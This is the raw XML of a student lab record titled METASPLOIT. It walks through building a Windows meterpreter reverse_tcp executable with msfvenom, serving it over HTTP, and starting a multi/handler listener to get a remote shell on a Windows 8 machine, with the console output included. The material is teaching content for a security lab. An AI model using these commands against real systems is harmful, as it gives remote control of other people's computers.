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BDCA4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Ex. No.: 8b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628C378C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Date: 20/04/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383BEA00" w14:textId="77777777" w:rsidR="00DB31EF" w:rsidRPr="00DB31EF" w:rsidRDefault="00DB31EF" w:rsidP="00DB31EF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  <w:t>METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8CCA4E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AIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB31EF"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  <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39F70A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ab/>
      </w:r>
      <w:r w:rsidRPr="00DB31EF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>To set up Metasploit framework and exploit reverse_tcp in Windows 8 machine remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C71944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48212F5A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ALGORITHM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB31EF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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C226DE1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 xml:space="preserve">1. Generate payload to be inserted into the remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE36F2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 xml:space="preserve">2. Set the LHOST and it’s port number </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEE8C19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 xml:space="preserve">3. Open msfconsole. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C817F0A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 xml:space="preserve">4. Use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF361F2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 xml:space="preserve">5. Establish reverse_tcp with the remote windows 8 machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A016D69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 xml:space="preserve">6. Run SimpleHTTPServer with port number 8000. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF2F95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 xml:space="preserve">7. Open the web browser in Windows 8 machine and type http://172.16.8.155:8000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E614A30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 xml:space="preserve">8. In KaliLinux, type sysinfo to get the information about Windows 8 machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1567CBDD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 xml:space="preserve">9. Create a new directory using mkdir command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A048825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>10.Delete the created directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7C963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19259B8E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OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CD6017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root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.8.155 LPORT=443 -f exe &gt; /root/hi.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEC3377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[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7F1F4B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[-] No arch selected, selecting arch: x86 from the payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE04986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No encoder or badchars specified, outputting raw payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39718C3F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Payload size: 341 bytes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541E1C62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Final size of exe file: 73802 bytes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2233D117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root@kali:~# msfconsole </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E93201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[-] ***Rting the Metasploit Framework console...\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65301140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[-] * WARNING: No database support: could not connect to server: Connection refused </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0012A9A2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Is the server running on host "localhost" (::1) and accepting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6702561C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TCP/IP connections on port 5432? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAE5B18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could not connect to server: Connection refused </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE996EA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Is the server running on host "localhost" (127.0.0.1) and accepting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F57C4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TCP/IP connections on port 5432? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6BBFD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[-] *** </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6C52F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_ _ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3287619C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/ \ /\ __ _ __ /_/ __ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB866BB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| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5349CB3B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| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51067238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|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58BBBC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|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2722FF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=[ metasploit v5.0.41-dev ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A764251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+ -- --=[ 1914 exploits - 1074 auxiliary - 330 post ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DAE150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+ -- --=[ 556 payloads - 45 encoders - 10 nops ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79028344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+ -- --=[ 4 evasion ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072B34C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msf5 &gt; use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B556484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msf5 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FE0A2D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payload =&gt; windows/meterpreter/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD91B51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msf5 exploit(multi/handler) &gt; show options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF9CA65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Module options (exploit/multi/handler): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6419C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Name Current Setting Required Description </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779FCAFF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---- --------------- -------- ----------- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B83DC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Payload options (windows/meterpreter/reverse_tcp): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E6611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Name Current Setting Required Description </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADE572B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---- --------------- -------- ----------- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2E0EB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EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B581D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LHOST yes The listen address (an interface may be specified) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B0019D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LPORT 4444 yes The listen port </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3ABCE7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Exploit target: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676DADBA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Id Name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AEA12B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-- ---- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769DE57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0 Wildcard Target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438382DA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msf5 exploit(multi/handler) &gt; set LHOST 172.16.8.155 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FB778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LHOST =&gt; 172.16.8.156 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E3B01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msf5 exploit(multi/handler) &gt; set LPORT 443 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA68FB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LPORT =&gt; 443 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA5A4B" w14:textId="77777777" w:rsidR="00DB31EF" w:rsidRPr="00DB31EF" w:rsidRDefault="00DB31EF" w:rsidP="00DB31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DB31EF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msf5 exploit(multi/handler) &gt; exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7166EBC6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[*] Started reverse TCP handler on 172.16.8.155:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147006F0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28C6F058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72FF1A8F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3FAAE1CD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19A54712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74A44FF5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5E9C62B6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3083D1EF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4C19944B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0C5ACC41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125A8646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35DDE8CC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1D38AAE2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2200729A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063930E7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5B15AECF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69E0316F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58D5614A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0D02384A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293631A5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1F1B5AB7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7773D4CD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31B7B0C3" w14:textId="77777777" w:rsidR="00DB31EF" w:rsidRPr="00DB31EF" w:rsidRDefault="00DB31EF" w:rsidP="00DB31EF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lastRenderedPageBreak/>
        <w:t>RESULT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB31EF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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F04FF14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DB31EF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ab/>
        <w:t xml:space="preserve">Thus, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB31EF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>Metasploit framework and exploit reverse_tcp in Windows 8 machine remotely has been setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBAA518" w14:textId="77777777" w:rsidR="00DB31EF" w:rsidRPr="00DB31EF" w:rsidRDefault="00DB31EF" w:rsidP="00DB31EF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7EF71EB5" w14:textId="77777777" w:rsidR="00FF448C" w:rsidRDefault="00FF448C"/>
    <w:sectPr w:rsidR="00FF448C" w:rsidSect="00DB31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2E570" w14:textId="77777777" w:rsidR="002C7FFC" w:rsidRDefault="002C7FFC" w:rsidP="00DB31EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0BBDCA7B" w14:textId="77777777" w:rsidR="002C7FFC" w:rsidRDefault="002C7FFC" w:rsidP="00DB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7294D" w14:textId="77777777" w:rsidR="00DB31EF" w:rsidRDefault="00DB3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9AF1F" w14:textId="77777777" w:rsidR="00DB31EF" w:rsidRDefault="00DB3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ECE91" w14:textId="77777777" w:rsidR="00DB31EF" w:rsidRDefault="00DB3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8361A" w14:textId="77777777" w:rsidR="002C7FFC" w:rsidRDefault="002C7FFC" w:rsidP="00DB31EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2F72015D" w14:textId="77777777" w:rsidR="002C7FFC" w:rsidRDefault="002C7FFC" w:rsidP="00DB3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ABF0C" w14:textId="77777777" w:rsidR="00DB31EF" w:rsidRDefault="00DB31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E9F26" w14:textId="7CFC4202" w:rsidR="00DB31EF" w:rsidRDefault="00DB31EF">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t>210701119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2BA56" w14:textId="77777777" w:rsidR="00DB31EF" w:rsidRDefault="00DB31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EF"/>
    <w:rsid w:val="002C7FFC"/>
    <w:rsid w:val="00C90BEA"/>
    <w:rsid w:val="00DB31EF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8D13"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{518EB9DC-C016-4E3B-A16A-3BCF554C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31E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B3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1EF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB3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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-17T19:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-17T19:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>